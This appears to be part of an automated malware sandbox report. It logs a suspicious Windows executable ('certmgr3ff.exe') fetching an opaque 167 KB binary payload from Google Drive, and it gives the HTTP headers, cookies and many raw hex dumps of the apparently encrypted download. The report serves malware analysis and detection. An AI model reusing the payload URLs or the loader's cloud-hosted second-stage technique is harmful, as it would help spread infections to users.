X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info." Location: https://docs.google.com/nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e%3Ddownload&hash=ne1ffd4kaaa27pue6e32mldfstfdqasf Date: Wed, 13 Oct 2021 13:51:47 GMT Expires: Wed, 13 Oct 2021 13:51:47 GMT Cache-Control: private, max-age=0 Content-Length: 0 Server: UploadServer Set-Cookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9_nonce=r167qul5841hi; Domain=doc-0o-60-docs.googleusercontent.com; Expires=Wed, 13-Oct-2021 14:01:47 GMT; Path=/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55; Secure; SameSite=none; HttpOnly Content-Type: text/html; charset=UTF-8 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49826	172.217.168.78	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:51:47 UTC	175	OUT	GET /nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e%3Ddownload&hash=ne1ffd4kaaa27pue6e32mldfstfdqasf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: docs.google.com Cookie: NID=511=erCQGVR30AbnlJ5pNFpHsCGAYJ62W5dN4Hm7_6YgJlXNAuvU7WRafMRXMCMPUdUZRh5Qtdjggd8vMSDtMqwA8YkuahRtOx0V3O1S2YDycscUArSU4sks1bjEIiTSreHgGw9rYdsWnbS3-plvVy97QEU2IECEplGBbrpSmmZ_Evs
2021-10-13 13:51:47 UTC	176	IN	HTTP/1.1 302 Found Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 13 Oct 2021 13:51:47 GMT Location: https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download&nonce=r167qul5841hi&user=04225796272126474013Z&hash=htm37s8j60l12inv0q761u8k5rdo7ceb Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentSignerHttp/cspreport Content-Security-Policy: script-src 'nonce-EjQxErA+Hzqw3tq0TWYjUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentSignerHttp/cspreport;worker-src 'self' Cross-Origin-Resource-Policy: cross-origin Report-To: {"group":"DriveUntrustedContentSignerHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external"}]} Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentSignerHttp" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49827	172.217.168.33	443	C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-13 13:51:47 UTC	178	OUT	GET /docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download&nonce=r167qul5841hi&user=04225796272126474013Z&hash=htm37s8j60l12inv0q761u8k5rdo7ceb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Connection: Keep-Alive Host: doc-0o-60-docs.googleusercontent.com Cookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9_nonce=r167qul5841hi
2021-10-13 13:51:48 UTC	178	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycduwNvBkykwKiMJ5kz92A94GQ44BU0k4kUBBwLm1qL5kBCP6iJ4iZ_elAZXh2KQNL690kdAUjMpwvzWLqOxWuRI Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info." Content-Type: application/octet-stream Content-Disposition: attachment;filename="oodf_BKGjFlg78.bin";filename*=UTF-8''oodf_BKGjFlg78.bin Content-Length: 167488 Date: Wed, 13 Oct 2021 13:51:47 GMT Expires: Wed, 13 Oct 2021 13:51:47 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=vfJ+GA== Server: UploadServer Set-Cookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9=04225796272126474013Z\|1634133075000\|cco6hf5p2hi2d6l67mrd596u1prmvso4; Domain=.googleusercontent.com; Expires=Wed, 13-Oct-2021 13:56:47 GMT; Path=/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55; Secure; SameSite=none; HttpOnly Set-Cookie: AUTH_2b3btrhtkn05e9f8mgnbbcclritoc6m9_nonce=; Domain=doc-0o-60-docs.googleusercontent.com; Expires=Tue, 12-Oct-2021 13:51:47 GMT; Path=/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55; Secure; SameSite=none; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-10-13 13:51:48 UTC	182	IN	Data Raw: 65 52 7e c8 bd a3 0c da 73 13 7c 05 bd d9 28 7e 01 64 b8 3b d0 7f cf 51 dc 99 26 b0 eb ac cf 92 82 64 85 80 cd 09 5e 97 32 4d b0 fe 61 76 2c 1c a4 43 39 fd ca da b2 10 64 8a d1 0b e2 e5 22 41 1e 9e ae aa d8 33 a2 91 7e 77 df eb ce 32 3f 1b 1c 86 1b 1d da b0 73 bb 59 6e fa b4 9e 1e 44 82 f0 bf 66 2d 31 ac 52 5c 11 c5 ed a0 44 29 ce cf 6d fb 36 fe 18 a0 75 ad 72 cc b9 38 89 d5 64 24 21 bb 57 af fa 24 b9 06 26 c9 54 ef 89 9d b7 c7 de ac 3e 80 fc 08 54 57 6f 1d 8d 38 07 23 74 46 df 44 6e 91 c0 33 65 b3 44 e2 46 67 02 b0 f2 c3 cf 73 0b 2f d5 83 56 1a f6 d7 f4 b3 4a 27 71 a1 74 94 84 e8 93 3c 19 40 3a 2d f9 f6 27 c7 2e 7c 02 99 fc 00 74 3b 28 37 cd 38 37 89 ab d1 29 78 ef 25 ce b4 8e d0 93 db c6 82 0e 22 88 ec 54 77 4e be e0 bc a6 2d c1 c9 2a 8c 0d 0e 87 f7 3d Data Ascii: eR~s\|(~d;Q&d^2Mav,C9d"A3~w2?sYnDf-1R\D)m6ur8d$!W$&T>TWo8#tFDn3eDFgs/VJ'qt<@:-'.\|t;(787)x%"TwN-*=
2021-10-13 13:51:48 UTC	187	IN	Data Raw: 7e ce 81 0b 18 34 43 f3 07 08 6a af 06 3d 78 6d 91 98 29 16 5c 41 0d 21 64 55 d4 25 02 4a 1a 83 65 a3 70 6d 7b 17 7b d2 66 03 8a ad 6a d5 1d 7d 31 8f 75 8b 80 6e 77 c5 97 d4 0f 2f f5 a7 44 d8 49 e7 b2 c4 56 7d 1d b8 0d 03 76 36 87 6b 55 b3 8c 82 c4 75 13 54 4f dd 84 68 77 1f 67 7f 04 df 4b 8b ff 93 09 60 71 79 d5 39 0a 2b 7e 87 9a 76 ee a7 e3 ee 51 f7 39 4a 26 01 11 69 f5 35 16 95 1f d7 93 f6 db 06 e5 3e 81 63 9b b0 96 fb 9c 44 c9 22 00 24 98 42 e9 ae bc e2 c8 25 32 ef cc 97 aa 22 92 b7 24 36 51 4e f5 39 da fe 54 fa 95 06 b5 a7 a0 9e 07 d4 79 f9 79 0d 9a a8 6d dc 6c f1 c8 5f f0 9e f0 d4 3c 58 f0 05 82 84 94 a4 3f 46 db f0 d3 dc 20 f7 46 a7 44 5a 36 0b 42 93 3f a3 2a 52 61 5c 1e 5c 29 d2 f2 95 5a c3 04 3c 53 87 ac 7d 5d 3d d4 0a 3a 34 d0 1c ba c3 86 96 26 Data Ascii: ~4Cj=xm)\A!dU%Jepm{{fj}1unw/DIV}v6kUuTOhwgK`qy9+~vQ9J&i5>cD"$B%2"$6QN9Tyyml_<X?F FDZ6B?*Ra\\)Z<S}]=:4&
2021-10-13 13:51:48 UTC	191	IN	Data Raw: 8c 83 76 c9 de aa ab 99 bc 1a a3 48 38 e4 ce 98 df ee 80 7f 43 4f 82 76 29 5e 6c d4 99 0a 31 fd a6 5d e2 83 ee 50 d8 80 b8 bf 0f 6f 28 13 b2 48 d3 31 56 6c 08 a0 bb 54 38 1d d8 17 0c 22 76 f7 b6 d2 66 81 d0 36 8a 05 cc 30 1d a8 4d 6f e2 a1 08 7e 8f b6 e8 8a bc 80 71 2f bc a8 26 a1 a8 4d 5b ad a3 cc b4 54 87 83 ac 4e 38 92 04 80 b1 f9 1e b2 28 f6 3b 46 c7 26 78 ec d4 e8 21 65 56 05 6f d6 67 27 b8 92 26 c8 4b 1c 50 03 e5 d0 8d 49 e2 a3 d2 f1 8f b5 11 b9 2e dd ac 3f 93 f3 0b 62 70 0a 38 a3 0e b0 b0 b9 00 c1 d0 f3 8b a8 cf 67 79 a4 ef 97 a8 a7 d1 8d a2 d1 56 f6 0d 5b 84 ce 8a 8f 8d a7 dd 57 41 9a 6e 14 8f e7 86 ae bf fe c3 65 df 6e 5c 3f 44 3d 21 87 cf 59 94 0a 05 71 52 72 64 6b 14 35 22 f9 9b c2 ba fa 49 1f 43 bf d0 84 46 bd 4c b5 f9 34 09 bb 30 97 7c 6a ec Data Ascii: vH8COv)^l1]Po(H1VlT8"vf60Mo~q/&M[TN8(;F&x!eVog'&KPI.?bp8gyV[WAnen\?D=!YqRrdk5"ICFL40\|j
2021-10-13 13:51:48 UTC	194	IN	Data Raw: 49 13 29 ab a5 ee e4 6b 8e d1 24 74 0a c9 b8 46 ff a1 68 ee 92 6b cb 1a 8e 5b ef 2d e4 3e 38 9d e6 8b a9 88 10 44 f3 aa 3b c3 5c 95 2e 29 5c 1e c0 80 34 e1 e2 0e 7b cb b7 ae be 15 ba 79 23 6e d6 78 30 c2 09 56 6a b3 e4 08 18 43 6a 8f b5 b1 eb 05 b4 1a 28 e4 3d 44 2d 3e c9 7a fa c7 3d 83 0a b7 4c 7a 39 24 21 0f c2 14 65 51 e7 20 c3 01 90 ae 8e 13 50 d4 ee 5f c5 e8 9b 81 21 5b 72 8e 0d d7 c9 2a 2e 14 90 e4 41 c9 ad dd c0 34 d4 d1 4e d6 38 80 e4 ce 7c 8f 2d 99 d7 6f 5c 84 73 70 1d b8 39 1c 7f ec 55 c6 70 3d 15 18 d2 e4 b3 f4 9f 08 3d 85 5f 9e 1e 37 b8 b0 7b c4 be bf fd 26 a7 23 af 5a 50 c2 45 aa 2f 41 68 4b 3c 32 3c c3 fc 48 67 3a 81 22 ec 8a 3a 98 c6 f3 85 7f 9f fd 3e 3f 6f 9f 7a ca 56 ce aa d9 24 3d 4a 14 b4 34 f9 68 73 83 24 0a 41 fa 27 81 37 3f 8a 70 0f Data Ascii: I)k$tFhk[->8D;\.)\4{y#nx0VjCj(=D->z=Lz9$!eQ P_![r*.A4N8\|-o\sp9Up==_7{&#ZPE/AhK<2<Hg:":>?ozV$=J4hs$A'7?p
2021-10-13 13:51:48 UTC	195	IN	Data Raw: 8f 8a d2 e5 43 d8 08 d1 8f 06 2a 54 78 35 7d 65 fb da ba e1 43 0b ff c9 6e 16 07 b7 06 ca f5 f7 88 25 c3 89 4d 71 e9 32 0f 51 c7 74 02 98 56 5e d4 5a 76 bb ed b7 73 e3 b2 67 30 59 4d bf 7c 04 e4 4b 4c 4c 34 94 4a 11 b2 03 33 f9 13 0f 81 8a d9 57 17 6d 6f c7 fe 5c af 9f 1c a6 53 d5 f1 83 7f c8 1d 3c fb 52 e9 f7 20 09 5f 58 e3 b6 2e 3d 88 c1 6d 59 c0 95 01 7a 51 cd 10 9a 3f 96 5f 73 bf 66 bc f1 d9 16 7c a8 16 3c a9 f2 80 a5 1a 1d 18 07 f0 a6 9e 18 9d 14 8b c8 ad 5b ac ef 98 4c 27 ac 99 34 96 6f a5 fa a2 48 2c e7 3f 87 9e ec 43 34 46 fd ac 0e 30 2a 03 20 b2 41 6e 7e 2f 5c 88 9b 21 f3 19 3f ba 90 e2 d9 fa 0e ba 8e 75 73 ac 80 8e 44 82 7b c3 de 29 b0 4b 52 5c ee 3a 2c 47 4c 1a 35 44 30 03 f7 05 10 21 96 52 72 cc b9 b3 6d 4d 60 a5 cc a4 12 a1 fa a3 4b 40 dd f0 Data Ascii: CTx5}eCn%Mq2QtV^Zvsg0YM\|KLL4J3Wmo\S<R _X.=mYzQ?_sf\|<[L'4oH,?C4F0 An~/\!?usD{)KR\:,GL5D0!RrmM`K@
2021-10-13 13:51:48 UTC	197	IN	Data Raw: 08 42 7f 68 bf b6 0a 05 88 16 1f 08 86 7d 62 22 1d d8 ff 31 cd d8 5d df 8f dc 11 39 89 fc e6 e7 c3 25 d6 a1 6d c9 17 16 f2 6f 25 1d 2b 11 c6 34 83 cc 36 4f 95 02 c1 db 41 37 ab 93 24 8b 23 44 9d 0e 2e 01 83 c9 27 c8 6f 05 0d 4b 61 79 80 48 64 b9 f7 73 02 89 19 f0 18 fc ea 9e 78 87 1f cd 07 b1 ef 79 78 9b 6a 07 74 7a 05 3b 86 47 85 88 bb 59 9a 5b 0a 4f 77 f1 ea 1f aa 95 8c d4 74 17 dc d0 5d 49 36 ea 88 53 62 46 4e 64 71 9a ad 7f e2 e7 40 99 cc 13 8c c9 06 c4 a9 ee c5 2e 02 76 30 1b 8d e1 54 46 81 e7 03 4e ed 2e ce cf 9a 53 9c 3e 9f 1a 1f 78 ec aa 0c 97 7e bf 5a 25 03 db 9c b2 13 f1 5d 8b 4d 91 53 87 82 35 eb 82 90 ad fc 5a 32 58 d7 43 2e 8f e9 93 c0 4e 18 69 a5 2e 9a 82 0d bc 3f 17 ba 79 dc dd d5 5b 3e 8e 33 2e 38 a5 3f 09 ca 02 ef 5b b2 57 2c 1f cc 26 2d Data Ascii: Bh}b"1]9%mo%+46OA7$#D.'oKayHdsxyxjtz;GY[Owt]I6SbFNdq@.v0TFN.S>x~Z%]MS5Z2XC.Ni.?y[>3.8?[W,&-
2021-10-13 13:51:48 UTC	198	IN	Data Raw: 31 b3 ed b1 5f 5d 12 5e 12 b3 d3 ca 07 fa 20 ab cf 02 3b a8 b7 df 2d 30 03 ea 43 dc f1 8f fc 0d 00 8a 5f 8d 91 64 85 b1 46 c8 55 77 ed ce 86 21 cf ba 13 85 65 99 17 b5 04 71 6a 10 5b 52 8e 4c b5 d8 f8 24 77 0d 44 0c 23 7e ca 6e 8a 6f 2e 79 5b 48 4d 1a 15 03 8f 0d 8d b5 3c ef 66 e7 6c 06 d4 0a 20 7c 83 f8 64 3b f3 37 f8 93 1d ae 8f c3 f4 0d 63 b6 0b 54 61 7b a6 0d c1 c9 92 06 79 0e cb 75 f8 64 cc 28 d8 6f 4c 17 d7 84 3f ee 24 06 51 e2 01 79 73 d3 b5 a3 1e 4d b8 b0 c2 8a d0 f8 7a 7d 28 36 7a 4d e8 1c 1d 59 c5 01 fe 91 bd 91 b6 8f c7 98 8f 3e 0f 6f 5b c8 7b 28 3f d1 d1 24 7e d0 54 51 9c 7e ec f9 d1 42 ba 14 18 a0 60 4a b1 13 3b f6 5e ef 7f 6c 7a 31 d8 c1 28 d4 af fb 34 25 77 7f 50 58 a1 44 aa 4a f7 b1 90 b1 e2 8c 2b b8 2d 66 09 c1 fc b9 19 cd 12 9f bf db 79 Data Ascii: 1_]^ ;-0C_dFUw!eqj[RL$wD#~no.y[HM<fl \|d;7cTa{yud(oL?$QysMz}(6zMY>o[{(?$~TQ~B`J;^lz1(4%wPXDJ+-fy
2021-10-13 13:51:48 UTC	199	IN	Data Raw: 23 18 8d f6 09 bf 08 0b 89 a5 87 96 a5 e9 6a b4 93 de f2 32 e0 67 9b 2d ef 95 c6 fa 22 80 54 f8 c7 04 f6 82 51 9d 12 18 93 84 0a 92 0d 9b 59 91 e4 97 b3 12 f5 43 80 d3 fc 22 d6 49 31 5d 04 7e 8a 73 73 1c b1 cc 96 7c 34 5d 02 a2 c0 5d 95 d4 9f 77 ad 3b 1c 4d a4 26 a9 6a f9 55 09 02 8d 86 38 78 d2 50 76 96 d1 bb bb 39 ef b8 37 67 e1 0e bb e6 50 17 92 15 f0 6d 47 a7 ff cd 7d 43 54 12 09 70 0f 9b b3 87 ca ed 77 c3 09 5f 94 23 db 88 75 5e bb 88 82 c8 14 b3 d5 96 4b 00 31 63 0e 5b f2 5c 66 ab e1 2d da 78 aa cd d0 08 11 7f 1d 1b 1d 17 b1 2f fa 93 a2 e0 23 92 43 72 c4 3a 24 20 96 d6 9f 3a 56 73 f7 01 2e ce 5b 7a 93 4a 84 29 e7 31 3d 32 b4 cf bd 4b eb f8 5a 2d c8 91 14 2f 0a eb f5 8a f7 98 57 3c b8 17 d9 71 a0 2d 99 98 b0 4a 7f e4 44 e8 e3 32 e8 01 3b ac 52 0d 47 Data Ascii: #j2g-"TQYC"I1]~ss\|4]]w;M&jU8xPv97gPmG}CTpw_#u^K1c[\f-x/#Cr:$ :Vs.[zJ)1=2KZ-/W<q-JD2;RG
2021-10-13 13:51:48 UTC	200	IN	Data Raw: 56 c3 8b 5f c1 dc b9 f0 08 04 1d 3a 0f f4 cf de cd 6d 22 df 6f c7 1a d0 99 13 d9 54 28 ae fd 77 7a 38 43 83 ea 62 c9 3a 07 81 ec d3 00 8b 08 e1 9c 0d e3 fd 44 21 e3 ad ef 8c df a9 0d 33 f0 93 ed fb 27 bb 61 c2 f3 40 78 10 44 13 d7 b0 f0 e7 14 02 18 eb 93 8d 73 c5 56 66 8c f3 1f 0f 3e fc 46 6c 22 17 5d b3 47 2f dc 67 8e 32 c9 fa 04 b0 4d 3f ff 2f 23 58 bb 1f 85 4e fc 1b 40 82 fb 20 f8 4d 19 24 4e 1f 86 b8 44 21 45 36 82 65 43 c7 05 d1 e2 eb aa 19 e8 da 41 25 e1 20 55 6b 8f 75 17 ef 94 91 6b 34 ea 88 02 6f ef a9 92 fb 63 c7 45 6a 6b d0 68 73 d7 a7 ff b1 03 ae 68 5b 2e e5 22 58 1d eb 60 30 bc 39 5a 68 4d fd fc 24 44 c7 35 af 94 12 d2 5f 15 52 84 7a 83 fd de 90 a9 8a 9e cc 4d eb 81 21 38 92 79 d0 8d 0e 78 9e 8f 56 e8 30 30 d2 c3 b4 24 a7 8e 17 53 b0 b1 e7 d6 Data Ascii: V_:m"oT(wz8Cb:D!3'a@xDsVf>Fl"]G/g2M?/#XN@ M$ND!E6eCA% Ukuk4ocEjkhsh[."X`09ZhM$D5_RzM!8yxV00$S
2021-10-13 13:51:48 UTC	202	IN	Data Raw: 87 06 8e 37 82 37 fa b6 7a 31 e3 52 9b 54 11 ba a0 72 29 09 8a b5 cf 36 fe 18 67 f0 c5 8d 33 46 64 31 a7 64 e3 aa c8 12 5e 05 e5 b0 a5 07 b6 d0 d3 bb 43 1c cb b7 b3 1e 37 0b 13 cc da f1 1c ad 68 66 8a 9f 51 54 9b f3 c6 e0 6f 10 1a e1 f7 d7 b8 b9 9a a1 9b a2 db 2a ca 9e 8e 5b 10 3a 11 bb b3 4a aa f4 5b f2 0d 44 a3 27 76 a0 59 b9 08 a8 be 1e 96 19 bd b5 fb fd b7 fe d4 d0 30 ef a2 75 54 dd 29 87 cf 9f 57 5f ac b7 d7 41 57 88 81 6d cf 71 9e 1a b2 0b 76 b0 31 2b d5 3c 36 85 98 e5 2a 9c f7 3c 36 49 65 f8 a1 41 c4 d9 99 99 d2 56 c3 ca 06 73 cb 88 d0 d0 33 83 b1 47 4c 50 32 58 2a 0b 84 bd c9 a7 e0 76 01 90 d4 b0 b7 dd 3f 65 3c a9 54 59 3c 88 fa 17 ed 9f 21 ef 40 90 a3 7b aa a1 06 44 45 02 80 bc 42 e2 a7 df 15 72 2d 69 ff 7d 68 c4 09 5f 08 ca 1d c4 c6 ac d6 2c 78 Data Ascii: 77z1RTr)6g3Fd1d^C7hfQTo[:J[D'vY0uT)W_AWmqv1+<6<6IeAVs3GLP2X*v?e<TY<!@{DEBr-i}h_,x
2021-10-13 13:51:48 UTC	203	IN	Data Raw: 30 19 da 6e f4 b2 41 02 3d bf 8a 0b ec 55 28 12 56 2f 5c 16 b2 68 a9 79 1b 13 1c 0f b5 4f 73 e2 7d 35 fa 99 93 09 28 1e 77 71 c4 c5 96 e1 68 ee 58 2d d9 e3 f5 a5 f4 86 3e d0 52 87 d7 93 e5 54 8b c7 62 7f 27 45 45 96 70 ef bf f1 45 8b b0 48 56 61 70 da 45 1e 36 80 f1 71 ad 52 b0 40 ca ea 0c 8a 15 e4 fb 14 b8 69 e9 cd 61 51 80 28 7d 19 ad 60 0b 96 0f 47 41 fa bc ef 93 60 c0 23 b8 42 f0 fb a8 f4 0d c0 2c 7c ad 29 f7 87 5c 72 01 b7 42 4e 96 0b 17 df 90 c1 5c f8 4d 41 be 5d 84 11 a2 0e 7f a7 1d 70 e2 7e 9e 76 ac 09 98 e2 5b e3 d5 c2 d5 f2 e9 1e 94 14 b5 85 96 88 d0 78 63 60 5b 35 19 a2 27 f1 b6 25 40 66 83 b3 28 62 7f c3 93 50 db d7 25 ab f3 d0 99 d8 5a b2 3f 9b 67 8d 19 c5 25 de 14 a3 ac 57 52 2a 13 5f 7c 53 3f 8c 2b 67 b3 6d 23 b0 aa d6 ac 10 07 cf 63 4a 3f Data Ascii: 0nA=U(V/\hyOs}5(wqhX->RTb'EEpEHVapE6qR@iaQ(}`GA`#B,\|)\rBN\MA]p~v[xc`[5'%@f(bP%Z?g%WR*_\|S?+gm#cJ?
2021-10-13 13:51:48 UTC	204	IN	Data Raw: 15 97 b8 32 12 0c 1a ed ba f9 5c 00 c3 bf bf 76 12 8d eb fc a9 c5 c2 2f aa 73 a0 d4 15 df b3 df ab 1f 08 fe 79 20 a9 db 9a 5a 05 7c 3d 75 f8 cf ed e5 5c 00 d7 56 29 a6 58 d1 db c7 75 14 27 28 20 f9 be 43 07 6c 32 2a a6 e1 08 6a 47 f0 df e1 2c 70 41 61 7b 4c c4 55 29 64 0a fc 66 09 8b 9b 93 bd ac 91 66 44 18 cd 11 2f ca e8 61 31 73 49 0c 2b f7 9e 6a 15 91 26 92 df b3 03 a3 13 58 53 43 af e8 04 7c 4d 3e 99 b2 45 64 7d 30 4d e1 57 3d cb a5 c0 fd 4b 0e 7e 5a 65 02 1c 1c ed b8 41 3b d3 63 a7 a1 cc ae 40 04 6b 80 60 b4 3f e0 22 74 7e 49 ac e3 86 0a 34 9f 97 1f 5b 0b ea bc 87 3c d0 99 85 6b 1a 27 52 4f 16 3e 21 94 e7 0d 5b d0 d3 bc 4d 4e 07 4b 6d bb e7 e3 11 e2 24 6b de 3b f4 79 ee a1 a0 20 c2 a9 6c c0 f3 5d 14 70 44 ad 4f 22 b3 c6 0e 5f 67 75 